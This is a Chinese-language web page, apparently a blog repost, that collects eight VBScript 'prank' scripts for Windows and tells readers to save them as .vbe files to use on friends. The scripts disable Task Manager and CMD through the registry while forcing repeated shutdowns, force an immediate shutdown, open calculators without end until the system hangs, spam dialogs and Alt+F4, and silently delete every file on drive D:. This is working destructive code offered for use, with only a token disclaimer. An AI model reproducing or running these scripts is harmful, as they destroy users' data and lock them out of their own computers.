赞
踩
一、
- set s=createobject("wscript.shell")
- set bag=getobject("winmgmts:\\.\root\cimv2")
- set pipe=bag.execquery("select * from win32_process where name='wscript.exe'")
- For Each id in pipe
- if instr(1,id.commandLine,wscript.scriptfullname)<>0 and pipe.count>=2 then
- s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
- s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",0,"REG_DWORD"
- id.terminate()
- else
- s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
- s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",1,"REG_DWORD"
- for i=1 to 60
- s.popup"系统将在"& 60-i &"秒后关机...",1,"系统提示",4096+48
- next
- Set colOS = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * FROM Win32_OperatingSystem")
- For Each eOs In colOS
- eOs.Win32Shutdown(2)
- Next
- end if
- Next
![](https://csdnimg.cn/release/blogv2/dist/pc/img/newCodeMoreWhite.png)
复制以上代码,在桌面建一个文本,把代码放进去,另存为VBE格式,
此代码的威力:
1:开机就强制自动关机
2:cmd命令打不开
3:结束任务不管用
4:F8安全模式也不管用
呵呵!听起来是不是有点恐怖啊,我在我朋友空间里看见也吓了一跳、
代码破解方法:就是再运行一次,就可以破解了,也就是第2次保存的那个VBE文件,,
PS:不要乱拿软件去整人,发生什么事可不要怪我啊。。
二、
- on error resume next
- dim WSHshellA
- set WSHshellA = wscript.createobject("wscript.shell")
- WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说你是傻B,我是天下第一大傻B不说宝宝,我是天下第一大傻B就一分钟关你机,不信,试试···"" ",0 ,true
- dim a
- do while(a <> "宝宝,我是天下第一大傻B")
- a = inputbox ("宝宝,我是天下第一大傻B,就不关机,快撒,说 ""宝宝,我是天下第一大傻B"" ","说不说","不说",8000,7000)
- msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
- loop
- msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,乖乖"
- dim WSHshell
- set WSHshell = wscript.createobject("wscript.shell")
- WSHshell.run "cmd.exe /c shutdown -a",0 ,true
- msgbox chr(13) + chr(13) + chr(13) + "宝宝是不是又帅啦??"
三、打开无数个计算器,直到死机
- set wsh=createobject("wscript.shell")
- do
- wsh.run "calc"
- loop
四、直接关机
- dim WSHshell
- set WSHshell = wscript.createobject("wscript.shell")
- WSHshell.run "shutdown -f -s -t 00",0 ,true
五、删除D:\所有文件
- dim WSHshell
- set WSHshell = wscript.createobject("wscript.shell")
- WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
六、不断弹出窗口
- while(1)
- msgbox "哈哈 你被耍了!"
- loop
七、不断按下alt+f4 (开什么都关闭……)
- dim WSHshell
- set WSHshell = wscript.createobject("wscript.shell")
- while(1)
- WSHshell.SendKeys "%{F4}"
- loop
八、按500次回车
- (以上代码在运行者的电脑上显示500个对话框。其中 do until s=500 ,500可以随意更改)
- dim s
- do until s=500
- s=s+1
- msgbox "哥们,给我按500次回车吧",64
- loop
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。